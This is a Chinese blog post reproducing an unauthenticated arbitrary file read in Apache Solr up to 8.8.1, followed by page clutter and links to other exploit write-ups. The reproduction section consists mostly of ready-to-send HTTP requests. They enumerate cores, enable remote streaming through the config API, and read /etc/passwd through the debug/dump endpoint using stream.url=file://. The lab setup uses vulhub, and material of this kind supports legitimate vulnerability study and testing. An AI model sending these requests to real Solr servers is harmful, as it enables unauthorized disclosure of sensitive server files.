Apache Solr <= 8.8.1任意文件读取漏洞复现

最新推荐文章于 2023-03-22 09:58:41 发布
最新推荐文章于 2023-03-22 09:58:41 发布
阅读量313 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40602516/article/details/115557146
版权

0x01 简介

Apache Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。

0x02 漏洞概述

Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件。

0x03 影响版本

Apache Solr <= 8.8.1

0x04 环境搭建

使用vulhub快速搭建

wget https://github.com/vulhub/vulhub/blob/master/solr/CVE-2019-17558/docker-compose.ymldocker-compose up -ddocker ps

 

图片

 

0x05 漏洞复现

1、获取core的信息:主要是name

http://xx.xx.xx.xx:8983/solr/admin/cores?indexInfo=false&wt=json

2、根据name构造获取config的包

根据返回包内容可判断存在漏洞

POST /solr/demo/config HTTP/1.1Host: 127.0.0.1:8983Content-Length: 80Connection: close {"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

3、构造读取/etc/passwd的包

POST /solr/demo/./debug/dump?param=ContentStreams HTTP/1.1Host: 127.0.0.1:8983Content-Length: 29Content-Type: application/x-www-form-urlencodedConnection: close stream.url=file:///etc/passwd
不想当脚本小子的脚本小子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
测试网站搭建+渗透+审计之第三篇Swagger接口渗透测试
千寻的博客
06-08 1797
Swagger 是一款RESTful接口的文档在线自动生成加功能测试的软件。
phpMyAdmin 4.8.1 远程文件包含漏洞复现
不想当脚本小子的脚本小子
04-04 949
0x01 漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在phpMyAdmin 4.8.2 之前的 4.8.x 版本中,其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 影响范围 phpMyAdmin 4.8.0 phpMyAdmin 4.8.1 0x02 漏洞环境 使用vulnhub快速搭建靶场 bash cd /vulhub/phpmyadmin/CVE-2018-12613 sudo docker-comp
如何入门漏洞挖掘,以及提高自己的挖掘能力
键盘的起始页
04-09 1214
0x01:前言 大家好我是米斯特团队的一员,我的id香瓜,我们团队在这次i春秋第二次漏洞挖掘大赛中,包揽了前五名,我key表哥一不小心拿了一个第一,导致很多人来加他好友问他,如何修炼漏洞挖掘能力,我今天帮大家解答一下这个疑问,哈哈哈。 漏洞挖掘是安全圈的一个核心之一,但是随着各大厂商安全意识的增强,以及各类waf的出现。一些像sql注入,文件上传,命令执行这些漏洞也不是那...
文件上传 - Apache SSI远程命令执行
Kevin's Blog
07-19 1212
文章目录一、漏洞原理二、漏洞场景/挖掘思路三、触发条件四、漏洞复现4.1 启动环境4.2 访问环境4.3 复现过程五、防御措施 一、漏洞原理   在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php / jsp / asp后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用语法执行任意命令。 Tips:(shtml释义) T1(作用?): 一些大的...
apache的..%5c漏洞原因源代码分析
FreeXploiT
10-24 1123
下面是源代码 src/main/http_request.c: 的处理请求的代码: static void process_request_internal(request_rec *r) { int access_status; /* Ignore embedded %2Fs in path for proxy requests */ if (r->proxyreq == NOT_PROXY
API安全Top 10 漏洞:crAPI漏洞靶场与解题思路
QIANDXX的博客
03-22 1248
在 hack 中学习,不要去学习 hack
面对外部攻击威胁,怎样确保API安全
m0_73803866的博客
09-26 632
为筑牢 API安全基础,企业应着眼长远构建前瞻性的云原生架构, 应面向微服务和容器环境对 API进行管理与安全防护,从实战化角度 进行 API安全防护体系的建设,将安全落实到 API全生命周期管理的 各个环节,构建具有更好的 API可见性和 API安全检测与响应体系。也得到大力发展,当前常见的技术从功能上看 包含了 API 发现、API 身份与访问控制、API 消息安全、API 传输安 全、威胁缓解、API威胁检测、API安全审计、API监测与跟踪、API 管理等几个方面。
Apache Solr8.8.1 SSRF 任意文件读取漏洞
06-03 443
1 Solr Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 ...
漏洞挖掘篇(进阶·下)
m0_57929980的博客
06-23 1369
漏洞挖掘篇(进阶·下):介绍符号执行技术、污点传播分析技术
Web Service渗透测试——介绍+实例演示
yggcwhat
04-08 2683
一、API 接口介绍 1.1 RPC(远程过程调用) 远程过程调用(英语:Remote Procedure Call,缩写为 RPC)是一个计算机通信协议。该协议允许运行于一台计算机的程序调用另一台计算机的子程序,而程序员无需额外地为这个交互作用编程。如果涉及的软件采用面向对象编程,那么远程过程调用亦可称作远程调用或远程方法调用,例:Java RMI。RPC 一般直接使用 TCP 协议进行通信,通常不涉及到 HTTP。HTTP 下面有2种技术: XML-RPC JSON-RPC Web se...
【精选】小白是如何挖漏洞的(技巧篇)
热门推荐
hackzkaq的博客
07-29 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 作者:掌控安全-山屿云 目录: 怎么找漏洞 找到后如何挖漏洞 关于通杀漏洞N day漏洞的挖掘 漏洞如何提交 每小结都有提供对应的案例,简直不要太nice! 这个月的SRC活动也快开始了,看到群里的小伙伴在问如何找漏洞,SQL注入的漏洞咋找,逻辑漏洞咋找,支付漏洞咋找,越权漏洞咋找,等等 其实这都一个道理,用谷歌语法,找通杀用fofa,这里演示几个类型的漏洞,其它的也是一个道理 第一个:SQL注入漏洞 AS:首先是SQL注入的,这个
flamelu#Vulnerability-1#Apache Solr<= 8.8.2 (最新) 任意文件删除1
07-25
Apache Solr全版本存在任意文件删除漏洞,在Solr默认安装后无需任何其它配置即可删除系统任意文件。详情可以参考:
Apache Solr最新版任意文件读取0day1
08-03
0x01 正全版本任意读取 (官拒绝修复)默认安装未授权情况下,各项配置皆为默认下载 Solr 最新版本复现1. 第步2. 第步0x03 漏洞信息跟进0x04
Apache Solr 任意文件读取.py
06-07
Apache Solr RemoteStreaming 任意文件读取和SSRF
Apache-Solr-EXP:Apache Solr任意文件读取EXP
03-20
Apache-Solr-EXP Apache Solr任意文件读取EXP 环境要求:Python 3.8+
Apache Solr 代码执行漏洞应急响应通告
05-05
Apache Solr 代码执行漏洞应急响应通告
Joomla目录遍历导致RCE漏洞复现(CVE-2021-23132)
不想当脚本小子的脚本小子
03-14 1356
漏洞复现小王子又回来啦~ 有道云笔记链接::http://note.youdao.com/noteshare?id=399c71dbffbd2d59dc60d015f4a08839&sub=13C13D53B28D4F81AC366215FAC1101C
shiro反序列化漏洞复现与自动化检测工具
不想当脚本小子的脚本小子
02-07 937
有道云笔记链接: http://note.youdao.com/noteshare?id=7e7d4d5b63954b7aab97a685e8538f1d&sub=0E19E7B7E6864D77ABDAB719139DC46D
ThinkPHP5RCE漏洞复现
不想当脚本小子的脚本小子
06-10 896
又到了闲来无事的漏洞复现时间~~~ ThinkPHP RCE漏洞是由于变量覆盖而引起的,漏洞源于可以对thinkphp/library/think/Request.php文件中的method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致RCE,其攻击点较为多,有些还具有限制条件,另外该漏洞在利用上会出现一些问题。 漏洞影响范围:<= 5.0.23、<= 5.1.32。 ...
apache solr 7升级
最新发布
12-22
Apache Solr是一款开源的搜索平台,其7版本升级带来了许多新特性和改进,使得用户能够更加高效地进行搜索和数据分析。升级到Apache Solr 7可以带来诸多好处。 首先,Solr 7提供了更好的性能和稳定性,通过优化搜索和索引速度,以及提高集群的吞吐量和并发性能,可以更好地满足大规模数据的搜索需求。同时,Solr 7还引入了基于时间的数据分析功能,可以更好地支持实时数据的处理和分析。 其次,Solr 7引入了新的查询语言和功能,包括布尔查询、近似查询、条件查询等,可以更加灵活地对数据进行搜索和过滤。同时,Solr 7还加强了对多语言和多字段搜索的支持,可以更好地满足不同语言和数据类型的搜索需求。 此外,Solr 7还提供了全新的管理界面和监控工具,可以更加方便地进行索引和集群的管理,以及实时监控集群状态和性能指标,有助于提高系统的可用性和稳定性。 总之,Apache Solr 7升级带来了更好的性能、更丰富的功能和更方便的管理工具,可以帮助用户更好地进行搜索和数据分析,提高系统的可用性和灵活性。因此,升级到Solr 7是非常值得的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值